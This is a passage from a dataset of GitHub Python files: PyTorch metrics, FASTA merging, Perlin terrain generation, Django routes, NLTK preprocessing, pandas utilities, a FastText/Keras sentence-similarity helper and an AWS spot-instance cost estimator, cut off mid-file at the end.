left.\")\n","repo_name":"unconnnected/python-100","sub_path":"002_dataTypes/002_exercises.py","file_name":"002_exercises.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7667325051","text":"import numpy as np\nimport torch\n\n@torch.no_grad()\ndef gaussian_nll_l(pred, data, params):\n min_dist = params[\"min_dist\"]\n\n pdists = pred[\"dists\"]\n means = pdists[:,:,0]\n lvars = pdists[:,:,1]\n\n nll = ((means - data.ldists) / lvars.exp())**2 / 2 + lvars\n w = data.node_norm[data.cell_mask].sqrt()\n weights = torch.outer(w, w)\n\n metric = torch.mean(nll * weights)\n\n return metric.item()\n\n@torch.no_grad()\ndef mean_mean_l(pred, data, params):\n pdists = pred[\"dists\"]\n means = pdists[:,:,0]\n mean_mean = torch.mean(means)\n\n return mean_mean.item()\n\n@torch.no_grad()\ndef mean_std_l(pred, data, params):\n pdists = pred[\"dists\"]\n lvars = pdists[:,:,1]\n std = torch.exp(lvars / 2)\n mean_std = torch.mean(std)\n\n return mean_std.item()\n\n@torch.no_grad()\ndef mse(pred, data, params, lbound=0., ubound=np.inf):\n pdists = pred[\"dists\"]\n\n idx = (data.dists >= lbound) & (data.dists <= ubound)\n err = ((pdists - data.dists)**2)[idx]\n # print(data.dists) ####\n\n metric = torch.mean(err)\n\n return metric.item()\n\n@torch.no_grad()\ndef mse_l(pred, data, params, lbound=0., ubound=np.inf):\n pdists = pred[\"dists\"]\n means = pdists[:,:,0]\n emeans = torch.exp(means)\n\n idx = (data.dists >= lbound) & (data.dists <= ubound)\n err = ((emeans - data.dists)**2)[idx]\n\n metric = 
torch.mean(err)\n\n    return metric.item()\n\n@torch.no_grad()\ndef mse_log(pred, data, params):\n    pdists = pred[\"dists\"]\n    means = pdists[:,:,0]\n\n    metric = torch.mean((means - data.ldists)**2)\n\n    return metric.item()\n\n@torch.no_grad()\ndef mean_chisq_l(pred, data, params):\n    pdists = pred[\"dists\"]\n    means = pdists[:,:,0]\n    lvars = pdists[:,:,1]\n    std = torch.exp(lvars / 2)\n\n    chisq = ((data.ldists - means) / std)**2\n    metric = torch.mean(chisq)\n\n    return metric.item()\n\ndef _get_ranks(x, device):\n    tmp = x.argsort(dim=1)\n    ranks = torch.zeros_like(tmp, device=device)\n    for i in range(x.shape[0]):\n        ranks[i,tmp[i,:]] = torch.arange(x.shape[1], device=device)\n    return ranks\n\n@torch.no_grad()\ndef spearman(pred, data, params):\n    device = params[\"device\"]\n\n    pdists = pred[\"dists\"]\n\n    x_rank = _get_ranks(pdists, device)\n    y_rank = _get_ranks(data.dists, device)\n\n    n = x_rank.shape[1]\n    upper = 6 * torch.sum((x_rank - y_rank).pow(2), dim=1)\n    down = n * (n ** 2 - 1.0)\n    rs = 1.0 - (upper / down)\n\n    return torch.mean(rs).item()\n\n@torch.no_grad()\ndef spearman_l(pred, data, params):\n    device = params[\"device\"]\n\n    pdists = pred[\"dists\"]\n    means = pdists[:,:,0]\n\n    x_rank = _get_ranks(means, device)\n    y_rank = _get_ranks(data.ldists, device)\n\n    n = x_rank.shape[1]\n    upper = 6 * torch.sum((x_rank - y_rank).pow(2), dim=1)\n    down = n * (n ** 2 - 1.0)\n    rs = 1.0 - (upper / down)\n\n    return torch.mean(rs).item()\n\ndef _trilaterate3D(rad, pos):\n    # print(rad) ####\n    # print(pos) ####\n    p1 = pos[0,:]\n    p2 = pos[1,:]\n    p3 = pos[2,:]\n    p4 = pos[3,:]\n\n    r1 = rad[0]\n    r2 = rad[1]\n    r3 = rad[2]\n    r4 = rad[3]\n\n    e_x = (p2 - p1) / np.linalg.norm(p2 - p1)\n    i = np.dot(e_x, (p3 - p1))\n    e_y = (p3 - p1 - (i * e_x)) / (np.linalg.norm(p3 - p1 - (i * e_x)))\n    e_z = np.cross(e_x, e_y)\n    d = np.linalg.norm(p2 - p1)\n    j = np.dot(e_y, (p3 - p1))\n    x = (r1**2 - r2**2 + d**2) / (2 * d)\n    y = ((r1**2 - r3**2 + i**2 + j**2 ) / (2 * j)) - ((i / j) * x)\n    z1 = np.sqrt(r1**2 - x**2 - y**2)\n    z2 = -z1\n    # print(x, y, z1) ####\n    ans1 = p1 + (x * e_x) + (y * e_y) + (z1 * e_z)\n    ans2 = p1 + (x * e_x) + (y * e_y) + (z2 * e_z)\n    dist1 = np.linalg.norm(p4 - ans1)\n    dist2 = np.linalg.norm(p4 - ans2)\n\n    if np.abs(r4 - dist1) < np.abs(r4 - dist2):\n        return ans1\n    else: \n        return ans2\n\n_trilaterate3D_v = np.vectorize(_trilaterate3D, excluded=[1], signature=\"(n)->(m)\")\n\n@torch.no_grad()\ndef tril_cons(pred, data, params, num_trials=5):\n    pdists = pred[\"dists\"].cpu().detach().numpy() \n    locs = data.pos[data.cell_mask].cpu().detach().numpy()\n    ncells = locs.shape[0]\n    preds = []\n    for _ in range(num_trials):\n        sel = np.random.choice(ncells, 4, replace=False)\n        rad = pdists[:,sel]\n        pos = locs[sel,:]\n        pred = _trilaterate3D_v(rad, pos)\n        # print(pred) ####\n        preds.append(pred)\n\n    preds = np.array(preds)\n    preds -= np.nanmean(preds, axis=0, keepdims=True)\n\n    mnorms = np.nanmean(np.sqrt((preds**2).sum(axis=2)))\n\n    return mnorms\n\n@torch.no_grad()\ndef acc(pred, data, params):\n    logits = pred[\"logits\"]\n    bin_preds = (logits >= 0)\n\n    acc = (bin_preds == data.adjs)\n\n    metric = acc.float().mean()\n\n    return metric.item()\n\n@torch.no_grad()\ndef f1(pred, data, params):\n    logits = pred[\"logits\"]\n    bin_preds = (logits >= 0)\n\n    tp = (bin_preds & data.adjs).float().sum()\n    fp = (bin_preds & ~data.adjs).float().sum()\n    fn = (~bin_preds & data.adjs).float().sum()\n\n    metric = tp / (tp + (fp + fn) / 2)\n\n    return metric.item()\n\n@torch.no_grad()\ndef mcc(pred, data, params):\n    logits = pred[\"logits\"]\n    
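# threshold raw scores at zero (equivalent to p >= 0.5 if these are sigmoid logits)\n    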
bin_preds = (logits >= 0)\n\n    tp = (bin_preds & data.adjs).float().sum()\n    tn = (~(bin_preds | data.adjs)).float().sum()\n    fp = (bin_preds & ~data.adjs).float().sum()\n    fn = (~bin_preds & data.adjs).float().sum()\n\n    metric = (\n        (tp * tn - fp * fn) \n        / torch.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))\n    )\n\n    return metric.item()\n\n@torch.no_grad()\ndef nll_vae_struct(pred, data, params):\n    nll = ((pred[\"coords\"] - data.cell_pos)**2).sum(dim=1) / 2\n    metric = nll.mean()\n\n    return metric.item()\n\n@torch.no_grad()\ndef nll_vae_sup(pred, data, params):\n    nll = ((pred[\"coords_from_exp\"] - data.cell_pos)**2).sum(dim=1) / 2\n    metric = nll.mean()\n\n    return metric.item()\n\n@torch.no_grad()\ndef nll_vae_exp(pred, data, params):\n    nll = ((pred[\"exp\"] - data.cell_exp)**2).sum(dim=1) / 2\n    metric = nll.mean()\n\n    return metric.item()\n\ndef _kl(mean_0, std_0, lstd_0, mean_1, std_1, lstd_1):\n    kl = (\n        (std_0**2 + (mean_1 - mean_0)**2) / (2 * std_1**2) \n        + lstd_1 \n        - lstd_0 \n        - 0.5\n    ).sum(dim=1)\n\n    return kl\n\n@torch.no_grad()\ndef kl_vae_exp(pred, data, params):\n    kl = _kl(pred[\"emb_mean\"], pred[\"emb_std\"], pred[\"emb_lstd\"], 1., 1., 0.)\n    metric = kl.mean()\n\n    return metric.item()\n\n@torch.no_grad()\ndef kl_vae_struct(pred, data, params):\n    kl = _kl(pred[\"aux_enc_mean\"], pred[\"aux_enc_std\"], pred[\"aux_enc_lstd\"], pred[\"emb_mean\"], pred[\"emb_std\"], pred[\"emb_lstd\"])\n    metric = kl.mean()\n    \n    return metric.item()\n","repo_name":"austintwang/st_gnn","sub_path":"model/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":6543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"71476720874","text":"import sys\nimport os\nfrom Bio import SeqIO\n\nmatchfile = sys.argv[1]\ninfile = open(matchfile)\nlines = infile.read()\ninfile.close()\n\nlines=lines.split('\\n') #split on return\nlines=[line for line in lines if line.strip() !=\"\"] #remove empty lines\n\nmatch={}\nfor i in lines: \n\tmatch[i.split('\\t')[0]]=i\n\nfor i in match: #Iterate through matches\n\tjan=match[i].split('\\t')[1] + '.final.fas'\n\tburk=match[i].split('\\t')[0] + '.final.fas'\n\n\tgreg_d = {'Gregarina_sp_Pseudo_7':'Gregarina_sp_Pseudo', 'Gregarina_sp_Pseudo_8':'Gregarina_sp_Pseudo', 'Gregarina_sp_Pseudo_9':'Gregarina_sp_Pseudo','Gregarina_sp_Poly_1_total':'Gregarina_sp_Poly', 'Gregarina_sp_Poly_29':'Gregarina_sp_Poly', 'Gregarina_sp_Poly_39':'Gregarina_sp_Poly', 'Protomagalhaensia_sp_Gyna_25':'Protomagalhaensia_sp_Gyna', 'Protomagalhaensia_sp_Gyna_26':'Protomagalhaensia_sp_Gyna', 'Protomagalhaensia_wolfi_75':'Protomagalhaensia_wolfi', 'Protomagalhaensia_wolfi_77':'Protomagalhaensia_wolfi', 'Protomagalhaensia_wolfi_80':'Protomagalhaensia_wolfi', 'Blabericola_migrator_1_total':'Blabericola_migrator', 'Blabericola_migrator_2_total':'Blabericola_migrator'}\n\n\tburki = SeqIO.parse(burk, \"fasta\") #Parse burki fasta\n\tjanou = SeqIO.parse(jan, \"fasta\") #Parse Jan fasta\n\t\n\tburki_d = {} #create empty dictionary that will be filled with the burki data \n\n\tfor i in burki: # iterate through burki fasta\n\t\tbh = i.id #assign fasta header as bh\n\t\tbs = i.seq #assign sequence as bs\n\t\tbhr = bh.split('__')[0] #remove the contig ID info from bh\n\t\tif bhr not in greg_d: #iterate through the keys/values in gregarine renaming dictionary\n\t\t\tburki_d[bhr]=i #add bhr as key to burki_d and add the entire record as values\n\t\telse:\n\t\t\tfor k,v in greg_d.items():\n\t\t\t\tif k == bhr:\n\t\t\t\t\tbhr=v\n\t\t\t#print 
(bhr)\n\t\t\tburki_d[bhr] = i #add the unmodified bh as merged dictionary key and the initial fasta header (with contig ID) and sequence to the dictionary as values \n\tfor i in janou: #iterate through jan fasta\n\t\tjh = i.id #assign fasta header as jh\n\t\tjs = i.seq #assign sequence as js\n\t\tjhr = jh.split('__')[0] #remove the contig ID info from jh to name jhr\n\t\tif jhr in burki_d:\n\t\t\tpass\n\t\telse:\n\t\t\tif jhr not in greg_d:\n\t\t\t\tburki_d[jhr]=i #add jhr as key to burki_d and add the entire record as values\n\t\t\telse:\n\t\t\t\tfor k2,v2 in greg_d.items(): #iterate through keys and values in greg renaming dictionary\n\t\t\t\t\tif jhr == k2: # if the jan fasta header is in greg_d renaming dictionary\n\t\t\t\t\t\tjhr=v2 # rename jh with the value from greg dictionary\n\t\t\t\t\t\tburki_d[jhr] = i #assign record to key jhr\n\twith open(jan+\".merged.fas\", \"w\") as merged:\n\t\tSeqIO.write(burki_d.values(), merged, \"fasta\")\n\n\n","repo_name":"EricSalomaki/RandomPythonScripts","sub_path":"merge_greg_fastas.py","file_name":"merge_greg_fastas.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"74206447274","text":"from random import randrange\nfrom Vector2 import Vector2\nfrom main import * \nimport math\n\nclass Perlin():\n    def interpolate(pa, pb, px):\n        ft = px * 3.141593\n        f = (1 - math.cos(ft)) * 0.5\n        return pa * (1 - f) + pb * f\n    \n    def interpolateTwo(pa, pb, px):\n        return pa * (1 - px) + pb * px\n\n    def __init__(self, amp = 100, wl = 100, w = 100, h = 100, fq = 1/100):\n        self.x = 0\n        self.yStart = 0\n        self.y = self.yStart \n        \n        self.w = w\n        self.h = h\n        \n        self.amp = amp # amplitude\n        self.wl = wl # wavelength\n        self.fq = fq # frequency\n        \n        self.M = 4294967296 # a - 1 should be divisible by m's prime factors\n        self.A = 166452 #c and m should be co-prime\n        self.C = 1\n        \n        self.Z = math.floor(randrange(1000)/1000 * self.M)\n        \n        self.a = self.rand()\n        self.b = self.rand()\n        \n    def rand(self):\n        self.Z = (self.A * self.Z + self.C) % self.M\n        return self.Z / self.M\n    \n    def create(self):\n        heights = []\n        while(self.x < self.w):\n            if (self.x % self.wl == 0):\n                self.a = self.b\n                self.b = self.rand()\n                self.y = self.yStart + self.a * self.amp\n            else:\n                self.y = self.yStart + Perlin.interpolate(self.a, self.b, (self.x % self.wl) / self.wl) * self.amp\n            heights.append(self.y)\n            self.x += 1\n        return heights\n    \n    #octave generator\n    def GenerateNoise(amp, wl, octaves, divisor, width):\n        result = []\n        for i in range(octaves):\n            result.append(Perlin(amp, wl, width).create())\n            amp /= divisor\n            wl /= divisor\n        return result\n\n    #combines octaves together\n    def CombineNoise(resultsList):\n        final = []\n        for index in range(len(resultsList[0])):\n            total = 0.0\n            for list in range(len(resultsList)):\n                total += resultsList[list][index]\n            final.append(total)\n        return final\n    \n\n\nclass Terrain():\n    \n    mapSize = (256,1000)\n    gridWorth = 33\n\n\n    groundNums = [2,3,4,5,6,7]\n    terrainMap = np.zeros(mapSize, dtype=np.uint8)\n    colors = [None, (100,100,200), (50,50,50), (200,200,200)]\n    \n    \n    octaves = 8\n    heights = Perlin.CombineNoise(Perlin.GenerateNoise(128,128,octaves,2,mapSize[1]))\n    firstHeight = mapSize[0]-round(heights[5])\n    \n    for col in range(len(terrainMap[0])):\n        startHeight = heights[col]\n        for row in range(mapSize[0]-round(startHeight),len(terrainMap)):\n            terrainMap[row][col] = 2\n    #\n    \n    \n    for i in range(len(terrainMap)):\n        for j in range(len(terrainMap[0])):\n            if 
terrainMap[i][j] == 2 and i < 100:\n                terrainMap[i][j] = 3\n            if terrainMap[i][j] == 0 and i > 150:\n                terrainMap[i][j] = 1\n    \n    \n    plt.imshow(terrainMap)\n    plt.show()\n    \n    def isCollider(x, y):\n        if y//Terrain.gridWorth >= 0 and y//Terrain.gridWorth < len(Terrain.terrainMap) and x//Terrain.gridWorth >= 0 and x//Terrain.gridWorth < len(Terrain.terrainMap[0]):\n            if Terrain.terrainMap[y//Terrain.gridWorth][x//Terrain.gridWorth] in Terrain.groundNums:\n                return True\n        return False\n\n    def getBlockType(x, y):\n        if y//Terrain.gridWorth >= 0 and y//Terrain.gridWorth < len(Terrain.terrainMap) and x//Terrain.gridWorth >= 0 and x//Terrain.gridWorth < len(Terrain.terrainMap[0]):\n            return Terrain.terrainMap[y//Terrain.gridWorth][x//Terrain.gridWorth]\n    \n    def getIndexes(x,y):\n        return y//Terrain.gridWorth, x//Terrain.gridWorth\n","repo_name":"TylerW546/2DExploration","sub_path":"terrain.py","file_name":"terrain.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"4484013924","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n    path(\"home/\",views.auditor_home,name=\"auditor\"),\n    \n    path(\"message/chat/\",views.chat_rooms,name=\"chat_rooms\"),\n    path(\"message/chat/\",views.message_chat,name=\"message_chat\"),\n    path(\"message/chat/auditor/send\",views.auditor_send,name=\"auditor_send\"),\n    path(\"message/chat/getMessages/\",views.getMessages,name=\"getMessages\"),\n\n    path(\"requests/\",views.request_list,name=\"auditor_request_list\"),\n    path(\"requests/<int:id>/detail/\",views.request_detail,name=\"auditor_request_detail\"),\n    path(\"requests/<int:id>/detail/change_nurse\",views.change_nurse,name=\"change_nurse\"),\n\n\n    path(\"results/\",views.result_list,name=\"test_result_list\"),\n    path(\"results/<int:id>/detail\",views.result_detail,name=\"test_result_detail\"),\n    path(\"results/<int:id>/approve\",views.approve_result,name=\"approve_result\"),\n    path(\"results/<int:id>/update\", views.result_update, name=\"result_update\"),\n    \n    path(\"reports/\",views.report_list,name=\"report_list\"),\n    path(\"reports/<int:id>/detail/\",views.report_detail,name=\"report_detail\"),\n]","repo_name":"AdemBendjama/Brave-Lab","sub_path":"auditor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"70479654312","text":"import pickle\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.stem import WordNetLemmatizer\r\n\r\n\r\n# Function to load cached data from a file\r\ndef load_cached_data(cache_filename):\r\n    try:\r\n        with open(cache_filename, 'rb') as cache_file:\r\n            return pickle.load(cache_file)\r\n    except FileNotFoundError:\r\n        return None\r\n\r\n\r\n# Function to filter data based on keywords\r\ndef filter_data(pre_processed_data, keywords):\r\n    cleaned_data = []\r\n    for article in pre_processed_data:\r\n        # Check if any keyword is present in the lowercase title or description\r\n        if any(keyword.lower() in article[\"title\"].lower() or keyword.lower()\r\n               in article[\"description\"].lower() for keyword in keywords):\r\n            cleaned_article = {\r\n                \"title\": article[\"title\"],\r\n                \"description\": article[\"description\"],\r\n                \"published date\": article[\"published date\"],\r\n                \"url\": article[\"url\"],\r\n                \"publisher\": article[\"publisher\"],\r\n                \"sentiment\": article[\"sentiment\"]\r\n            }\r\n            
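# only the fields used downstream are kept; all other article keys are dropped\r\n            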
cleaned_data.append(cleaned_article)\r\n\r\n print(\"Total number of filtered articles:\", len(cleaned_data))\r\n\r\n return cleaned_data\r\n\r\n\r\n# Function to preprocess text using tokenization, lemmatization, and stopword removal\r\ndef preprocess_text(text, vocab, unk_id):\r\n tokens = word_tokenize(text)\r\n tokens = [token.lower() for token in tokens]\r\n\r\n # Lemmatization\r\n lemmatizer = WordNetLemmatizer()\r\n tokens = [lemmatizer.lemmatize(token) for token in tokens]\r\n\r\n # Remove stopwords\r\n stop_words = set(stopwords.words('english'))\r\n tokens = [token for token in tokens if token not in stop_words]\r\n\r\n # Map tokens to their integer IDs using the provided vocabulary\r\n ids = [vocab.get(token, unk_id) for token in tokens]\r\n return ids\r\n","repo_name":"ronniepiku/SANTA","sub_path":"Data/data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10935623848","text":"\"\"\"\nCommon Functions\n\"\"\"\n\nfrom urllib.parse import unquote\nimport re\n\nimport pandas as pd\n\n\ndef is_integer(n):\n \"\"\"Determines the provided string is an integer number.\"\"\"\n try:\n float(n)\n except ValueError:\n return False\n else:\n return float(n).is_integer()\n\n\ndef extract_integer_from_string(s):\n \"\"\"Extracts integer from string provided.\"\"\"\n m = re.search(r'(\\d+)', s)\n if m:\n return int(m.group(1))\n\n\ndef change_column_type(df: pd.DataFrame, to_date=None, to_datetime=None):\n \"\"\"Changes column type in dataframe from str to date or datetime.\"\"\"\n if not to_date:\n to_date = ['date', 'firstSessionDate']\n if not to_datetime:\n to_datetime = ['dateHour', 'dateHourMinute']\n\n for col in df.columns:\n if col in to_date:\n df[col] = pd.to_datetime(df[col], infer_datetime_format=True, errors='coerce').dt.date\n if col in to_datetime:\n df[col] = pd.to_datetime(df[col], infer_datetime_format=True, errors='coerce')\n\n return df\n\n\ndef replace_columns(df: pd.DataFrame, rules: list):\n \"\"\"Converts dataframe columns using regex.\n\n Args\n df: dataframe to be converted\n rules: list of tuple (column name, regex, to)\n \"\"\"\n for r in rules:\n col, rule, to = r\n try:\n _ = df[col].replace(rule, to, inplace=True, regex=True)\n except KeyError as e:\n print(e)\n pass\n\n\ndef prep_df(df, delete_columns: list = None, type_columns: dict = None, rename_columns: dict = None):\n \"\"\"Processes dataframe\n\n Args\n delete_columns:\n list of column name to be deleted\n type_columns:\n dict of column name -> data type\n ex. 
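any dtype accepted by DataFrame.astype, e.g. 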
{'pageviews': 'int32'}\n        rename_columns:\n            dict of column name -> new column name\n    Returns\n        processed dataframe\n    \"\"\"\n    if len(df) > 0:\n        if delete_columns:\n            # delete\n            df.drop(delete_columns, axis=1, inplace=True)\n        if type_columns:\n            # change type\n            df = df.astype(type_columns)\n        if rename_columns:\n            # rename\n            df.columns = df.columns.to_series().replace(rename_columns, regex=True)\n    return df\n\n\ndef get_date_range(start_date: str, end_date: str, format_: str = '%Y-%m-%d'):\n    \"\"\"Converts date range to a list of each date in the range.\"\"\"\n    date_range = pd.date_range(start_date, end_date)\n    return [d.strftime(format_) for d in date_range]\n\n\ndef get_chunked_list(original_list: list, chunk_size: int = 100):\n    \"\"\"Splits a list into chunks.\"\"\"\n    chunked_list = []\n    for i in range(0, len(original_list), chunk_size):\n        chunked_list.append(original_list[i:i + chunk_size])\n    return chunked_list\n\n\ndef get_clean_url(url: str, params_to_keep: list = None):\n    \"\"\"Remove parameters from URL Query String\"\"\"\n\n    if not params_to_keep:\n        params_to_keep = []\n\n    if \"?\" in url:\n        base_url, arglist = url.split(\"?\", 1)\n        args = arglist.split(\"&\")\n        new_args = []\n        for arg in args:\n            try:\n                k, v = arg.split(\"=\", 1)\n            except ValueError:\n                k = arg\n            if k.lower() in params_to_keep:\n                new_args.append(unquote(arg))\n                # print(f\"keeping {arg}\")\n            else:\n                # print(f\"deleting {arg}\")\n                pass\n        if len(new_args) > 0:\n            # if param remains\n            return \"?\".join([base_url, \"&\".join(new_args)])\n        else:\n            # all params are removed\n            return base_url\n    else:\n        return url\n","repo_name":"mak00s/megaton","sub_path":"megaton/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"22145505010","text":"import numpy as np\nfrom gensim.models.fasttext import FastText\nfrom nltk.tokenize import word_tokenize\nfrom nltk import RegexpTokenizer\nimport tensorflow as tf\nimport tensorflow.keras.backend as K\nfrom keras.models import load_model\n\nbase_path = \"/Users/adamfdhl/Documents/Adam/College/Code/semantic-similarity\"\nglobal model_embedding\nglobal deep_module\n\ndef diff_sentence_length(sentence_1, sentence_2):\n    len_sentence_1 = len(sentence_1)\n    len_sentence_2 = len(sentence_2)\n\n    return abs(len_sentence_1 - len_sentence_2)/(len_sentence_1 + len_sentence_2)\n\ndef cosine_similarity(sentence_1, sentence_2):\n    # tokenization\n    list_1 = word_tokenize(sentence_1.lower())\n    list_2 = word_tokenize(sentence_2.lower())\n\n    # into set of words\n    set_1 = {w for w in list_1}\n    set_2 = {w for w in list_2}\n\n    vector_1 = []\n    vector_2 = []\n\n    # form a set containing keywords of both strings \n    rvector = set_1.union(set_2) \n    for w in rvector: \n        if w in set_1: \n            vector_1.append(1)\n        else: vector_1.append(0)\n        if w in set_2: \n            vector_2.append(1)\n        else: vector_2.append(0)\n    c = 0\n\n    # calculate cosine \n    for i in range(len(rvector)): \n        c+= vector_1[i]*vector_2[i] \n    cosine = c / float((sum(vector_1)*sum(vector_2))**0.5) \n    return cosine\n\ndef shallow_module(sentence_1, sentence_2):\n    diff_length = diff_sentence_length(sentence_1, sentence_2)\n    cosine = cosine_similarity(sentence_1, sentence_2)\n\n    return cosine - diff_length\n\ndef to_vector(sentence, feature_size = 300, max_len=100):\n    tokenized_sentence = word_tokenize(sentence)\n\n    tokenizer = RegexpTokenizer(r\"\\w+\")\n    words = tokenizer.tokenize(sentence)\n    clean_words = 
[word for word in words if word.isalpha()]\n    fix_words = [word for word in clean_words if len(word) > 1]\n    sentence_embeddings = []\n\n    for word in fix_words:\n        sentence_embeddings.append(model_embedding.wv[word])\n        if (len(sentence_embeddings) >= max_len):\n            break\n    \n    sentence_embeddings = sentence_embeddings + [[0] * feature_size\n                          for _ in range(max(0, max_len - len(sentence_embeddings)))\n                          ]\n    sentence_embeddings = np.array(sentence_embeddings).astype(np.float32)\n\n    return sentence_embeddings\n\ndef compute_pearson(y_true, y_pred):\n    # Pearson's correlation coefficient = covariance(X, Y) / (stdv(X) * stdv(Y))\n    fs_pred = y_pred - np.mean(y_pred)\n    fs_true = y_true - np.mean(y_true)\n    covariance = np.mean(fs_true * fs_pred)\n\n    stdv_true = np.std(y_true)\n    stdv_pred = np.std(y_pred)\n\n    return covariance / (stdv_true * stdv_pred)\n\ndef pearson_correlation(y_true, y_pred):\n    x = y_true\n    y = y_pred\n    mx = K.mean(x)\n    my = K.mean(y)\n    xm, ym = x-mx, y-my\n    r_num = K.sum(tf.multiply(xm,ym))\n    r_den = K.sqrt(tf.multiply(K.sum(K.square(xm)), K.sum(K.square(ym))))\n    r = r_num / r_den\n\n    r = K.maximum(K.minimum(r, 1.0), -1.0)\n    return r\n\n#https://stackoverflow.com/questions/46619869/how-to-specify-the-correlation-coefficient-as-the-loss-function-in-keras\ndef correlation_coefficient_loss(y_true, y_pred):\n    x = y_true\n    y = y_pred\n    mx = K.mean(x)\n    my = K.mean(y)\n    xm, ym = x-mx, y-my\n    r_num = K.sum(tf.multiply(xm,ym))\n    r_den = K.sqrt(tf.multiply(K.sum(K.square(xm)), K.sum(K.square(ym))))\n    r = r_num / r_den\n\n    r = K.maximum(K.minimum(r, 1.0), -1.0)\n    return K.square(1 - r)\n\nmodel_embedding = FastText.load(base_path + \"/Models/Word Embedding/idwiki.model\")\ndeep_module = load_model(base_path + \"/Models/model_32_02_05\", custom_objects = {\n        \"correlation_coefficient_loss\": correlation_coefficient_loss,\n        \"pearson_correlation\": pearson_correlation\n    })\n\ndef get_lexical_similarity(sentence_1, sentence_2):\n    lexical_similarity = []\n    result = shallow_module(sentence_1, sentence_2)\n    lexical_similarity.append(result)\n    lexical_similarity = np.array(lexical_similarity).astype(np.float32)\n    return lexical_similarity\n\ndef preprocess_sentence(sentence):\n    embedded_sentence = to_vector(sentence)\n    embedded_sentence = [embedded_sentence]\n    embedded_sentence = np.array(embedded_sentence).astype(np.float32)\n    return embedded_sentence\n\ndef integration_module(sentence_1, sentence_2, proportion_semantic, shared_parameter):\n    embedded_sentence_1 = preprocess_sentence(sentence_1)\n    embedded_sentence_2 = preprocess_sentence(sentence_2)\n    lexical_similarity = get_lexical_similarity(sentence_1, sentence_2)\n    semantic_similarity = deep_module.predict([embedded_sentence_1, embedded_sentence_2]).reshape(-1)\n    result = shared_parameter * semantic_similarity[0] + proportion_semantic * lexical_similarity\n    return result[0]\n","repo_name":"adamfdhl/uks-backend","sub_path":"utils/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"7309105817","text":"import logging\nimport sys\nimport time\nimport boto3\nfrom datetime import datetime\nfrom datetime import timedelta\nimport operator\nimport threading\nfrom instance_operations import instance_operations\nimport rds_operations\n\n# function getLogger\n#\n# \\param name: Name of the logger\n# \\return Logger object\n#\n# This function simply creates a new logger object to output information\ndef getLogger(name):\n    
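# NB: logging.getLogger returns a shared instance per name, so calling this twice\n    # with the same name attaches duplicate handlers (guard with logger.hasHandlers()).\n    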
now = datetime.now()\n #Logging configuration\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n #Log formatter\n formatter = logging.Formatter(\"[%(asctime)s] %(levelname)-8s %(message)s\")\n #Log File handler\n handler = logging.FileHandler(\"jm_handler.log\")\n handler.setLevel(logging.DEBUG)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n #Screen handler\n screenHandler = logging.StreamHandler(stream=sys.stdout)\n screenHandler.setLevel(logging.DEBUG)\n screenHandler.setFormatter(formatter)\n logger.addHandler(screenHandler)\n return logger\n\n# function get_from_input\n#\n# \\param _string: String to be searched from input\n# \\param input_dict: Input dictionary of pairs key=value\n# \\return Value stored for _string or -1 if it does not exist\ndef get_from_input(_string, input_dict):\n if _string in input_dict:\n return input_dict[_string]\n else:\n return -1\n\n# function pareto\n# \\param target_nodes: number of instances that will be used\n# \\param data_hash: data to be executed hash (needs to be stored in the database)\n# \\param idparameters: database id with the parameters used in experiment\n#\n# This function will print the estimated Pareto given the stored performance and\n# current price for each instance. Note that the Job Manager instance selected\n# is the c5.4xlarge and all disks are 20GB 1000IOPS, therefore the prices are\n# defined as such.\n#\n# Furthermore, we consider a performance penalty of 0.1% for each new instance\n# added.\ndef pareto(target_nodes, data_hash, idparameters):\n all_zones = ['us-east-1a', 'us-east-1b', 'us-east-1c', 'us-east-1d', 'us-east-1e', 'us-east-1f']\n\n conn = rds_operations.rds_connect()\n target_tasks = rds_operations.get_interpols(conn, idparameters, rds_operations.get_iddata(conn, data_hash))\n iddata = rds_operations.get_iddata(conn, data_hash)\n\n all_performance = rds_operations.get_interpsec_allinstances(conn, iddata, idparameters)\n ops = instance_operations(logger)\n\n jm_perf = 0\n for result in all_performance:\n if result[0]== \"c5.4xlarge\":\n jm_perf = float(result[1])\n\n logger.info(\"INSTANCE_TYPE\\tTIME_TO_RUN(seconds)\\tCOST(dollars)\")\n for result in all_performance:\n instance_type = result[0]\n interpsec = result[1]\n stddev_interpsec = result[2]\n\n # prices = instance_operations.get_current_spot_price_allaz(ec2, instance_type)\n\n best_price = 10000\n best_az = \"\"\n\n for az in all_zones:\n price = ops.get_current_spot_price(instance_type, az) + 0.09375\n\n if (price < best_price and price > 0):\n best_price = price\n best_az = az\n\n costperinterp = float(interpsec / (best_price / 3600))\n string = \"{}\\t{}\\t{}\"\n time_to_run = target_tasks / (jm_perf + interpsec * target_nodes * (1-((target_nodes-1)/1000.0)))\n price_to_pay = time_to_run * target_nodes * best_price / 3600 + time_to_run * 0.68 / 3600\n logger.info(string.format(instance_type,time_to_run,price_to_pay))\n\n# function main\n#\n# \\param (command line input) interval : time to wait for the next iteration in minutes\n# \\param (command line input) budget : budget in dollars to complete the execution\n# \\param (command line 